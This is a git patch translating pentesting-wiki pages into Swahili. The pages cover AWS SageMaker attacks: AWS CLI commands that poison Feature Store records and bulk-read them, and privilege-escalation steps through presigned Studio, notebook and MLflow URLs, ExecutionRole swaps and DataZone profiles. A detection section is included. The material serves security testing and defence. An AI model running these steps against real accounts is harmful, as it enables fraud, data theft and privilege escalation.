From d79bfbb2f385c46023f6ceebf7595f2048da8eb7 Mon Sep 17 00:00:00 2001 From: Translator Date: Fri, 17 Oct 2025 15:55:25 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/aws-security/aws-post-exploitation/aws --- .../feature-store-poisoning.md | 172 ++++++++++-- .../aws-sagemaker-privesc/README.md | 264 +++++++++++++++--- .../aws-services/aws-sagemaker-enum/README.md | 92 +++--- .../README.md | 107 +------ 4 files changed, 419 insertions(+), 216 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md index 55daa3703..0727c5528 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md 
@@ -1,50 +1,160 @@ # SageMaker Feature Store online store poisoning -Tumia vibaya `sagemaker:PutRecord` kwenye Feature Group iliyowezeshwa OnlineStore ili kuandika upya thamani za vipengele zinazotumika moja kwa moja na online inference. Ikiwa imeunganishwa na `sagemaker:GetRecord`, mshambuliaji anaweza kusoma vipengele nyeti. Hii haihitaji ufikiaji wa models au endpoints. +Tumia kwa mabaya `sagemaker:PutRecord` kwenye Feature Group yenye OnlineStore imewezeshwa ili kubadilisha (overwrite) thamani za feature zinayotumika na online inference. Ikitumika pamoja na `sagemaker:GetRecord`, mshambuliaji anaweza kusoma features nyeti na exfiltrate data ya ML ya siri. Hii haihitaji ufikiaji wa models au endpoints, na hivyo ni shambulio la moja kwa moja kwenye tabaka la data. ## Mahitaji - Ruhusa: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord` -- Lengo: Feature Group iliyowezeshwa OnlineStore (kawaida ikiwa nyuma ya inference ya wakati halisi) +- Lengo: Feature Group yenye OnlineStore imewezeshwa (kawaida inasaidia real-time inference) +- Ugumu: **LOW** - Amri rahisi za AWS CLI, hakuna urekebishaji wa modeli unaohitajika ## Hatua -1) Chagua au unda Feature Group ndogo ya Online kwa ajili ya majaribio + +### Reconnaissance + +1) Orodhesha Feature Groups zenye OnlineStore zimewezeshwa +```bash +REGION=${REGION:-us-east-1} +aws sagemaker list-feature-groups \ +--region $REGION \ +--query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \ +--output table +``` +2) Elezea Feature Group lengwa ili kuelewa schema yake +```bash +FG= +aws sagemaker describe-feature-group \ +--region $REGION \ +--feature-group-name "$FG" +``` +Kumbuka `RecordIdentifierFeatureName`, `EventTimeFeatureName`, na definisheni zote za feature. Hizi zinahitajika ili kuunda rekodi halali. 
+ +### Senario la Shambulio 1: Uchafuzi wa Data (Kuandika tena rekodi zilizopo) + +1) Soma rekodi halali ya sasa +```bash +aws sagemaker-featurestore-runtime get-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-value-as-string user-001 +``` +2) Chafua rekodi kwa thamani zenye madhara kwa kutumia parameter ya inline `--record` +```bash +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) + +# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user +aws sagemaker-featurestore-runtime put-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record "[ +{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"}, +{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"}, +{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"}, +{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"}, +{\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"} +]" \ +--target-stores OnlineStore +``` +3) Thibitisha data iliyopotoshwa +```bash +aws sagemaker-featurestore-runtime get-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-value-as-string user-001 +``` +**Athari**: Modeli za ML zinazotumia sifa hii sasa zitaona `risk_score=0.99` kwa mtumiaji halali, na inaweza kuzizuia miamala yao au huduma zao. 
+ +### Senario ya Shambulio 2: Malicious Data Injection (Create Fraudulent Records) + +Ingiza rekodi mpya kabisa zenye sifa zilizofanyiwa udanganyifu ili kuepuka udhibiti wa usalama: +```bash +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) + +# Create fake user with artificially low risk to perform fraudulent transactions +aws sagemaker-featurestore-runtime put-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record "[ +{\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"}, +{\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"}, +{\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"}, +{\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"}, +{\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"} +]" \ +--target-stores OnlineStore +``` +Thibitisha the injection: +```bash +aws sagemaker-featurestore-runtime get-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-value-as-string user-999 +``` +**Athari**: Attacker anaunda kitambulisho bandia chenye alama ya hatari ya chini (0.01) ambacho kinaweza kufanya miamala ya udanganyifu zenye thamani kubwa bila kuamsha fraud detection. + +### Senario ya Shambulio 3: Sensitive Data Exfiltration + +Soma rekodi nyingi ili kutoa features za siri na kuchambua tabia ya modeli: +```bash +# Exfiltrate data for known users +for USER_ID in user-001 user-002 user-003 user-999; do +echo "Exfiltrating data for ${USER_ID}:" +aws sagemaker-featurestore-runtime get-record \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-value-as-string ${USER_ID} +done +``` +**Athari**: Vipengele vya siri (alama za hatari, mifumo ya miamala, data za kibinafsi) vinafunuliwa kwa mshambuliaji. 
+ +### Kuunda Feature Group ya Mtihani/Demo (Hiari) + +Iwapo unahitaji kuunda Feature Group ya mtihani: ```bash REGION=${REGION:-us-east-1} FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text) if [ -z "$FG" -o "$FG" = "None" ]; then ACC=$(aws sts get-caller-identity --query Account --output text) -FG=ht-fg-$ACC-$(date +%s) +FG=test-fg-$ACC-$(date +%s) ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole) -aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN" + +aws sagemaker create-feature-group \ +--region $REGION \ +--feature-group-name "$FG" \ +--record-identifier-feature-name entity_id \ +--event-time-feature-name event_time \ +--feature-definitions "[ +{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"}, +{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"}, +{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}, +{\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"}, +{\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"} +]" \ +--online-store-config "{\"EnableOnlineStore\":true}" \ +--role-arn "$ROLE_ARN" + echo "Waiting for feature group to be in Created state..." 
for i in $(seq 1 40); do ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true) -echo $ST; [ "$ST" = "Created" ] && break; sleep 15 +echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15 done fi -``` -2) Ingiza/andika upya rekodi mtandaoni (poison) -```bash -NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) -cat > /tmp/put.json << JSON -{ -"FeatureGroupName": "$FG", -"Record": [ -{"FeatureName": "entity_id", "ValueAsString": "user-123"}, -{"FeatureName": "event_time", "ValueAsString": "$NOW"}, -{"FeatureName": "risk_score", "ValueAsString": "0.99"} -], -"TargetStores": ["OnlineStore"] -} -JSON -aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json -``` -3) Soma rekodi tena ili kuthibitisha mabadiliko -```bash -aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString" -``` -Inatarajiwa: risk_score irudie 0.99 (attacker-set), ikithibitisha uwezo wa kubadilisha vipengele vya mtandaoni vinavyotumika na models. -## Athari -- Shambulio la uadilifu la wakati halisi: badilisha vipengele vinavyotumika na models za uzalishaji bila kugusa endpoints/models. -- Hatari ya usiri: soma vipengele nyeti kupitia GetRecord kutoka OnlineStore. 
+echo "Feature Group ready: $FG" +``` +## Ugunduzi + +Fuatilia CloudTrail kwa mifumo ya kutatanisha: +- `PutRecord` events from unusual IAM principals or IP addresses +- Wito wa juu wa `PutRecord` au `GetRecord` +- `PutRecord` with anomalous feature values (e.g., `risk_score` outside normal range) +- Operesheni kubwa za `GetRecord` zinazoonyesha mass exfiltration +- Ufikiaji nje ya saa za kawaida za kazi au kutoka maeneo yasiyotegemewa + +Tekeleza ugunduzi wa anomalia: +- Uthibitishaji wa thamani za feature (e.g., `risk_score` must be 0.0-1.0) +- Uchambuzi wa mifumo ya uandishi (frequency, timing, source identity) +- Ugunduzi wa mabadiliko ya data (sudden changes in feature distributions) + +## Marejeo +- [AWS SageMaker Feature Store Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store.html) +- [Feature Store Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-security.html) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md index 2654d3a99..4dbb3a11c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md 
@@ -6,34 +6,116 @@ ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` -Anza kuunda noteboook na IAM Role iliyounganishwa ili kupata ufikiaji: +Anza kuunda noteboook ukiwa na IAM Role iliyounganishwa ili kupata access yake: ```bash aws sagemaker create-notebook-instance --notebook-instance-name example \ --instance-type ml.t2.medium \ --role-arn arn:aws:iam:::role/service-role/ ``` -Jibu linapaswa kuwa na uwanja wa `NotebookInstanceArn`, ambao utakuwa na ARN ya notebook instance mpya iliyoundwa. Tunaweza kisha kutumia API ya `create-presigned-notebook-instance-url` kutengeneza URL ambayo tunaweza kutumia kufikia notebook instance mara itakapokuwa tayari: +Majibu yanapaswa kuwa na uwanja wa `NotebookInstanceArn`, ambao utakuwa na ARN ya notebook instance iliyoumbwa hivi karibuni. Baadaye tunaweza kutumia API ya `create-presigned-notebook-instance-url` kuunda URL ambayo tunaweza kutumia kufikia notebook instance mara itakapokuwa tayari: ```bash aws sagemaker create-presigned-notebook-instance-url \ --notebook-instance-name ``` -Navigate to the URL with the browser and click on `Open JupyterLab`` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button. +Nenda kwenye URL kwa kutumia kivinjari na bonyeza `Open JupyterLab` upande wa juu kulia, kisha shuka chini hadi kichupo cha “Launcher” na chini ya sehemu ya “Other”, bonyeza kitufe cha “Terminal”. -Sasa inawezekana kufikia metadata credentials za IAM Role. +Sasa inawezekana kupata metadata credentials za IAM Role. -**Athari Inayowezekana:** Privesc kwa sagemaker service role iliyotajwa. +**Athari Inayowezekana:** Privesc to the sagemaker service role specified. ### `sagemaker:CreatePresignedNotebookInstanceUrl` -Ikiwa kuna Jupyter **notebooks tayari zinaendesha** juu yake na unaweza kuorodhesha kwa `sagemaker:ListNotebookInstances` (au kuzitambua kwa njia nyingine yoyote). 
Unaweza **kutengeneza URL kwao, kufikia, na kuiba credentials kama ilivyoelezwa katika mbinu iliyotangulia**. +Ikiwa kuna Jupyter **notebooks tayari zinakimbia** juu yake na unaweza kuziorodhesha kwa `sagemaker:ListNotebookInstances` (au kuzibaini kwa njia nyingine yoyote). Unaweza **kuunda URL kwao, kuzifikia, na kuiba credentials kama ilivyotajwa katika mbinu iliyotangulia**. ```bash aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name ``` -**Athari Inayoweza Kutokea:** Privesc kwa sagemaker service role iliyounganishwa. +**Athari Inayoweza Kutokea:** Privesc kwa sagemaker service role iliyohusishwa. + +## `sagemaker:CreatePresignedDomainUrl` + +> [!WARNING] +> Shambulio hili linafanya kazi tu kwenye domain za zamani za jadi za SageMaker Studio, sio zile zilizotengenezwa na SageMaker Unified Studio. Domains kutoka Unified Studio zitarudisha hitilafu: "This SageMaker AI Domain was created by SageMaker Unified Studio and must be accessed via SageMaker Unified Studio Portal". + +Kitambulisho chenye ruhusa ya kuita `sagemaker:CreatePresignedDomainUrl` kwenye Studio `UserProfile` lengwa kinaweza kutengeneza URL ya kuingia inayothibitisha moja kwa moja ndani ya SageMaker Studio kama profile hiyo. Hii inampa kivinjari cha mshambuliaji kikao cha Studio kinachoirithisha ruhusa za profile za `ExecutionRole` na upatikanaji kamili wa home ya profile iliyounganishwa na EFS na apps. Hakuna `iam:PassRole` au ufikiaji wa console unahitajika. + +**Mahitaji**: +- SageMaker Studio `Domain` na `UserProfile` lengwa ndani yake. +- Mhusika (principal) wa mshambuliaji anahitaji `sagemaker:CreatePresignedDomainUrl` kwenye `UserProfile` lengwa (kwa kiwango cha rasilimali) au `*`. 
+ +Mfano wa sera ya chini kabisa (scoped to one UserProfile): +```json +{ +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "sagemaker:CreatePresignedDomainUrl", +"Resource": "arn:aws:sagemaker:::user-profile//" +} +] +} +``` +**Hatua za Matumizi Mabaya**: + +1) Orodhesha Studio Domain na UserProfiles ambavyo unaweza kulenga +```bash +DOM=$(aws sagemaker list-domains --query 'Domains[0].DomainId' --output text) +aws sagemaker list-user-profiles --domain-id-equals $DOM +TARGET_USER= +``` +2) Angalia kama unified studio haitumiki (shambulio linafanya kazi tu kwenye domaini za kawaida za SageMaker Studio) +```bash +aws sagemaker describe-domain --domain-id --query 'DomainSettings' +# If you get info about unified studio, this attack won't work +``` +3) Tengeneza presigned URL (inayofanya kazi kwa takriban ~5 dakika kwa chaguo-msingi) +```bash +aws sagemaker create-presigned-domain-url \ +--domain-id $DOM \ +--user-profile-name $TARGET_USER \ +--query AuthorizedUrl --output text +``` +4) Fungua URL iliyorejeshwa kwenye kivinjari ili kuingia kwenye Studio kama mtumiaji lengwa. Katika terminal ya Jupyter ndani ya Studio thibitisha utambulisho wa ufanisi au exfiltrate the token: +```bash +aws sts get-caller-identity +``` +Vidokezo: +- `--landing-uri` inaweza kutowekwa. Baadhi ya thamani (mfano, `app:JupyterLab:/lab`) zinaweza kukataliwa kulingana na flavor/version ya Studio; defaults kawaida zinaelekeza kwanza kwenye home ya Studio kisha kwenda Jupyter. +- Sera za shirika/VPC endpoint restrictions zinaweza bado kuzuia upatikanaji wa mtandao; utengenezaji wa tokeni hautaji kuingia kwenye console au `iam:PassRole`. + +**Athari Inayoweza Kutokea**: Mwendo wa upande na kuongezeka kwa idhini kwa kutokea kama UserProfile yoyote ya Studio yenye ARN iliyoruhusiwa, ukirithi `ExecutionRole` yake na filesystem/apps zake. 
+ + +### `sagemaker:CreatePresignedMlflowTrackingServerUrl`, `sagemaker-mlflow:AccessUI`, `sagemaker-mlflow:SearchExperiments` + +Kitambulisho chenye ruhusa ya kuita `sagemaker:CreatePresignedMlflowTrackingServerUrl` (na `sagemaker-mlflow:AccessUI`, `sagemaker-mlflow:SearchExperiments` kwa upatikanaji wa baadaye) kwa lengo la SageMaker MLflow Tracking Server kinaweza kutengeneza presigned URL ya matumizi moja inayothibitisha moja kwa moja kwa MLflow UI iliyosimamiwa kwa server hiyo. Hii inatoa upatikanaji sawa na mtumiaji halali angekuwa nayo kwa server (kuona/kutengeneza experiments na runs, na kupakua/kupakia artifacts katika S3 artifact store ya server). + +**Mahitaji:** +- SageMaker MLflow Tracking Server katika account/region na jina lake. +- Msemaji wa mshambuliaji anahitaji `sagemaker:CreatePresignedMlflowTrackingServerUrl` kwenye rasilimali ya lengo la MLflow Tracking Server (au `*`). + +**Hatua za matumizi mabaya**: + +1) Orodhesha MLflow Tracking Servers unazoweza kulenga na chagua jina moja +```bash +aws sagemaker list-mlflow-tracking-servers \ +--query 'TrackingServerSummaries[].{Name:TrackingServerName,Status:TrackingServerStatus}' +TS_NAME= +``` +2) Tengeneza presigned MLflow UI URL (itakayokuwa halali kwa muda mfupi) +```bash +aws sagemaker create-presigned-mlflow-tracking-server-url \ +--tracking-server-name "$TS_NAME" \ +--query AuthorizedUrl --output text +``` +3) Fungua URL iliyorejeshwa katika kivinjari ili kufikia MLflow UI kama mtumiaji aliyeidhinishwa kwa Tracking Server hiyo. + +**Athari Inayoweza Kutokea:** Ufikiaji wa moja kwa moja wa MLflow UI iliyosimamiwa kwa Tracking Server lengwa, unaowawezesha kuona na kubadilisha experiments/runs, pamoja na kupata au kupakia artifacts zilizohifadhiwa katika S3 artifact store iliyosanidiwa kwenye server, kwa mujibu wa ruhusa zinazotekelezwa na usanidi wa server. 
+ ### `sagemaker:CreateProcessingJob`, `iam:PassRole` -Mshambuliaji mwenye ruhusa hizo anaweza kufanya **SageMaker iteekeleze processing job** na SageMaker role iliyounganishwa nayo. Kwa kutumia tena mmoja wa AWS Deep Learning Containers ambao tayari ina Python (na kuendesha job katika mkoa uleule kama URI), unaweza kuendesha code inline bila kujenga images zako mwenyewe: +Mshambuliaji mwenye ruhusa hizo anaweza kusababisha **SageMaker iendeshe processing job** ikiwa na role ya SageMaker imeambatishwa. Kwa kutumia tena mojawapo ya AWS Deep Learning Containers ambayo tayari ina Python (na kwa kuendesha job katika eneo sawa na URI), unaweza kuanzisha code inline bila kuunda images zako mwenyewe: ```bash REGION= ROLE_ARN= @@ -49,11 +131,11 @@ aws sagemaker create-processing-job \ # Las credenciales llegan al webhook indicado. Asegúrate de que el rol tenga permisos ECR (AmazonEC2ContainerRegistryReadOnly) para descargar la imagen. ``` -**Potential Impact:** Privesc kwa sagemaker service role iliyotajwa. +**Athari Inayoweza Kutokea:** Privesc kwa sagemaker service role iliyotajwa. ### `sagemaker:CreateTrainingJob`, `iam:PassRole` -Mshambuliaji mwenye ruhusa hizo anaweza kuanzisha training job itakayoweza kuendesha msimbo yoyote kwa role iliyotajwa. Kwa kutumia container rasmi ya SageMaker na kubadilisha entrypoint kwa payload inline, hauhitaji kujenga images zako mwenyewe: +Mshambuliaji akiwa na ruhusa hizo anaweza kuanzisha training job ambayo inatekeleza msimbo wa hiari kwa kutumia role iliyotajwa. Kwa kutumia container rasmi ya SageMaker na kubadilisha entrypoint kwa payload inline, hauhitaji kujenga images zako mwenyewe: ```bash REGION= ROLE_ARN= 
@@ -73,11 +155,11 @@ aws sagemaker create-training-job \ # El payload se ejecuta en cuanto el job pasa a InProgress y exfiltra las credenciales del rol. ``` -**Athari Inayowezekana:** Privesc kwa SageMaker service role iliyotajwa. +**Athari Inayoweza Kutokea:** Privesc kwa role ya huduma ya SageMaker iliyotajwa. ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole` -Mshambulizi mwenye ruhusa hizo anaweza kuanzisha HyperParameter Tuning Job ambayo inaendesha attacker-controlled code chini ya role iliyotolewa. Script mode inahitaji kuhifadhi payload katika S3, lakini hatua zote zinaweza kuendeshwa kiotomatiki kutoka kwa CLI: +Mshambuliaji mwenye ruhusa hizo anaweza kuanzisha HyperParameter Tuning Job ambayo itaendesha msimbo unaodhibitiwa na mshambuliaji chini ya role iliyotolewa. Script mode inahitaji kuhifadhi payload katika S3, lakini hatua zote zinaweza kuendeshwa kiotomatiki kupitia CLI: ```bash REGION= ROLE_ARN= 
@@ -183,28 +265,29 @@ aws sagemaker create-hyper-parameter-tuning-job \ --hyper-parameter-tuning-job-config '{"Strategy":"Random","ResourceLimits":{"MaxNumberOfTrainingJobs":1,"MaxParallelTrainingJobs":1},"HyperParameterTuningJobObjective":{"Type":"Maximize","MetricName":"train:loss"}}' \ --training-job-definition file:///tmp/hpo-definition.json ``` -Kila mafunzo yanayozinduliwa na mchakato huchapisha kipimo na exfiltrate credentials za role iliyotajwa. +Kila mafunzo unaozinduliwa na mchakato huchapisha kipimo na hutoa kwa siri kredensiali za role iliyotajwa. -### `sagemaker:UpdateUserProfile`/`UpdateSpace`/`UpdateDomain` Studio role swap (no `iam:PassRole`) +### `sagemaker:UpdateUserProfile`, `iam:PassRole`, `sagemaker:CreateApp`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`) -Kipaumbele cha ExecutionRole: +Kwa ruhusa ya kusasisha SageMaker Studio User Profile, kuunda app, presigned URL kwa app na `iam:PassRole`, mshambuliaji anaweza kuweka `ExecutionRole` kwa role yoyote ya IAM ambayo service principal ya SageMaker inaweza kuikubali. Apps mpya za Studio zinazozinduliwa kwa profile hiyo zitaendeshwa kwa role iliyobadilishwa, zikitoa ruhusa za kuongezwa za kiingiliano kupitia Jupyter terminals au jobs zinazozinduliwa kutoka Studio. -- `UserProfile` hupitisha thamani nyingine yoyote. Ikiwa profaili ina `ExecutionRole`, Studio itatumia role hiyo kila wakati. -- `Space` inatumika tu wakati profaili haina role yake mwenyewe; vinginevyo, ile ya profaili ndiyo itabakia. -- `Domain DefaultUserSettings` hufanya kazi kama suluhisho la mwisho wakati wala profaili wala space hawatafafanua role. - -Ili kuwa na ruhusa za kusasisha SageMaker Studio User Profile (au Space/Domain), mshambuliaji anaweza kuweka `ExecutionRole` kwa role yoyote ya IAM ambayo service principal ya SageMaker inaweza kuchukua. Tofauti na APIs za kuunda jobs, APIs za kusasisha profile za Studio hazihitaji `iam:PassRole`. 
Apps mpya za Studio zinazozinduliwa kwa profaili hiyo zitaendesha kwa role iliyobadilishwa, zikitoa ruhusa za juu za kiingiliano kupitia terminali za Jupyter au jobs zilizoanzishwa kutoka Studio. +> [!WARNING] +> Shambulio hili linataka kwamba hakuna applications kwenye profile, vinginevyo uundaji wa app utakosa na kosa linalofanana na: `An error occurred (ValidationException) when calling the UpdateUserProfile operation: Unable to update UserProfile [arn:aws:sagemaker:us-east-1:947247140022:user-profile/d-fcmlssoalfra/test-user-profile-2] with InService App. Delete all InService apps for UserProfile and try again.` +> Ikiwa kuna app yoyote utahitaji ruhusa ya `sagemaker:DeleteApp` ili kuzifuta kwanza. Hatua: ```bash -# 1) List Studio user profiles and pick a target +# 1) List Studio domains and pick a target +aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}' + +# 2) List Studio user profiles and pick a target aws sagemaker list-user-profiles --domain-id-equals # Choose a more-privileged role that already trusts sagemaker.amazonaws.com ROLE_ARN=arn:aws:iam:::role/ -# 2) Update the Studio profile to use the new role (no iam:PassRole) +# 3) Update the Studio profile to use the new role (no iam:PassRole) aws sagemaker update-user-profile \ --domain-id \ --user-profile-name \ 
@@ -215,18 +298,59 @@ aws sagemaker describe-user-profile \ --user-profile-name \ --query 'UserSettings.ExecutionRole' --output text -# 3) If the tenant uses Studio Spaces, swap the ExecutionRole at the space level -aws sagemaker update-space \ ---domain-id \ ---space-name \ ---space-settings ExecutionRole=$ROLE_ARN +# 3.1) Optional if you need to delete existing apps first +# List existing apps +aws sagemaker list-apps \ +--domain-id-equals -aws sagemaker describe-space \ +# Delete an app +aws sagemaker delete-app \ --domain-id \ ---space-name \ ---query 'SpaceSettings.ExecutionRole' --output text +--user-profile-name \ +--app-type JupyterServer \ +--app-name -# 4) Optionally, change the domain default so every profile inherits the new role +# 4) Create a JupyterServer app for a user profile (will inherit domain default role) +aws sagemaker create-app \ +--domain-id \ +--user-profile-name \ +--app-type JupyterServer \ +--app-name + + +# 5) Generate a presigned URL to access Studio with the new domain default role +aws sagemaker create-presigned-domain-url \ +--domain-id \ +--user-profile-name \ +--query AuthorizedUrl --output text + +# 6) Open the URL in browser, navigate to JupyterLab, open Terminal and verify: +# aws sts get-caller-identity +# (should show the high-privilege role from domain defaults) + +``` +**Potential Impact**: Privilege escalation kwa ruhusa za execution role ya SageMaker iliyotajwa kwa interactive Studio sessions. + + +### `sagemaker:UpdateDomain`, `sagemaker:CreateApp`, `iam:PassRole`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`) + +Kwa ruhusa za kubadilisha SageMaker Studio Domain, kuunda app, presigned URL kwa app, na `iam:PassRole`, mshambuliaji anaweza kuweka default domain `ExecutionRole` kuwa IAM role yoyote ambayo SageMaker service principal inaweza assume. 
Apps mpya za Studio zinazozinduliwa kwa profaili hiyo zitaendeshwa kwa role iliyobadilishwa, zikitoa ruhusa zilizoinuliwa kwa njia ya kiingiliano kupitia terminal za Jupyter au jobs zinazozinduliwa kutoka Studio. + +> [!WARNING] +> Shambulizi hili linahitaji kuwa hakuna applications ndani ya domain, vinginevyo uundaji wa app utashindwa kwa kosa: `An error occurred (ValidationException) when calling the UpdateDomain operation: Unable to update Domain [arn:aws:sagemaker:us-east-1:947247140022:domain/d-fcmlssoalfra] with InService App. Delete all InService apps in the domain including shared Apps for [domain-shared] User Profile, and try again.` + +Hatua: +```bash +# 1) List Studio domains and pick a target +aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}' + +# 2) List Studio user profiles and pick a target +aws sagemaker list-user-profiles --domain-id-equals + +# Choose a more-privileged role that already trusts sagemaker.amazonaws.com +ROLE_ARN=arn:aws:iam:::role/ + +# 3) Change the domain default so every profile inherits the new role aws sagemaker update-domain \ --domain-id \ --default-user-settings ExecutionRole=$ROLE_ARN 
@@ -235,22 +359,86 @@ aws sagemaker describe-domain \ --domain-id \ --query 'DefaultUserSettings.ExecutionRole' --output text -# 5) Launch a JupyterServer app (or generate a presigned URL) so new sessions assume the swapped role -aws sagemaker create-app \ +# 3.1) Optional if you need to delete existing apps first +# List existing apps +aws sagemaker list-apps \ +--domain-id-equals + +# Delete an app +aws sagemaker delete-app \ --domain-id \ --user-profile-name \ --app-type JupyterServer \ ---app-name js-atk +--app-name -# Optional: create a presigned Studio URL and, inside a Jupyter terminal, run: -# aws sts get-caller-identity # should reflect the new ExecutionRole +# 4) Create a JupyterServer app for a user profile (will inherit domain default role) +aws sagemaker create-app \ +--domain-id \ +--app-type JupyterServer \ +--app-name js-domain-escalated + +# 5) Generate a presigned URL to access Studio with the new domain default role aws sagemaker create-presigned-domain-url \ --domain-id \ --user-profile-name \ --query AuthorizedUrl --output text -``` -**Athari Inayowezekana**: Privilege escalation hadi ruhusa za execution role ya SageMaker iliyotajwa kwa ajili ya vikao vya Studio vinavyoshirikiana. +# 6) Open the URL in browser, navigate to JupyterLab, open Terminal and verify: +# aws sts get-caller-identity +# (should show the high-privilege role from domain defaults) +``` +**Athari Inayowezekana**: Kupandishwa kwa cheo (privilege escalation) hadi ruhusa za SageMaker execution role zilizotajwa kwa vikao vya Studio vinavyoshirikiana. + +### `sagemaker:CreateApp`, `sagemaker:CreatePresignedDomainUrl` + +Mshambulizi mwenye ruhusa ya kuunda app ya SageMaker Studio kwa UserProfile lengwa anaweza kuanzisha app ya JupyterServer inayotumia `ExecutionRole` ya profile. Hii inatoa upatikanaji wa kiingilizi kwa ruhusa za role kupitia terminal za Jupyter au jobs zinazoanzishwa kutoka Studio. 
+ +Hatua: +```bash +# 1) List Studio domains and pick a target +aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}' + +# 2) List Studio user profiles and pick a target +aws sagemaker list-user-profiles --domain-id-equals + +# 3) Create a JupyterServer app for the user profile +aws sagemaker create-app \ +--domain-id \ +--user-profile-name \ +--app-type JupyterServer \ +--app-name js-privesc + +# 4) Generate a presigned URL to access Studio +aws sagemaker create-presigned-domain-url \ +--domain-id \ +--user-profile-name \ +--query AuthorizedUrl --output text + +# 5) Open the URL in browser, navigate to JupyterLab, open Terminal and verify: +# aws sts get-caller-identity +``` +**Athari Inayoweza Kutokea**: Ufikiaji wa kuingiliana kwa execution role ya SageMaker iliyounganishwa na UserProfile lengwa. + + +### `iam:GetUser`, `datazone:CreateUserProfile` + +Mshambuliaji mwenye ruhusa hizo anaweza kumpa mtumiaji ufikiaji wa IAM ndani ya Sagemaker Unified Studio Domain kwa kuunda DataZone User Profile kwa mtumiaji huyo. +```bash +# List domains +aws datazone list-domains --region us-east-1 \ +--query "items[].{Id:id,Name:name}" \ +--output json + +# Add IAM user as a user of the domain +aws datazone create-user-profile \ +--region us-east-1 \ +--domain-identifier \ +--user-identifier \ +--user-type IAM_USER +``` +URL ya Unified Domain ina muundo ufuatao: `https://.sagemaker..on.aws/` (kwa mfano `https://dzd-cmixuznq0h8cmf.sagemaker.us-east-1.on.aws/`). + +**Athari Inayowezekana:** Ufikiaji wa Sagemaker Unified Studio Domain kama mtumiaji, ikimruhusu kufikia rasilimali zote ndani ya domain ya Sagemaker na hata kuinua vibali hadi role inayotumiwa na notebooks ndani ya Sagemaker Unified Studio Domain. ## Marejeo diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md index 600b6a1fc..21013cf87 100644 
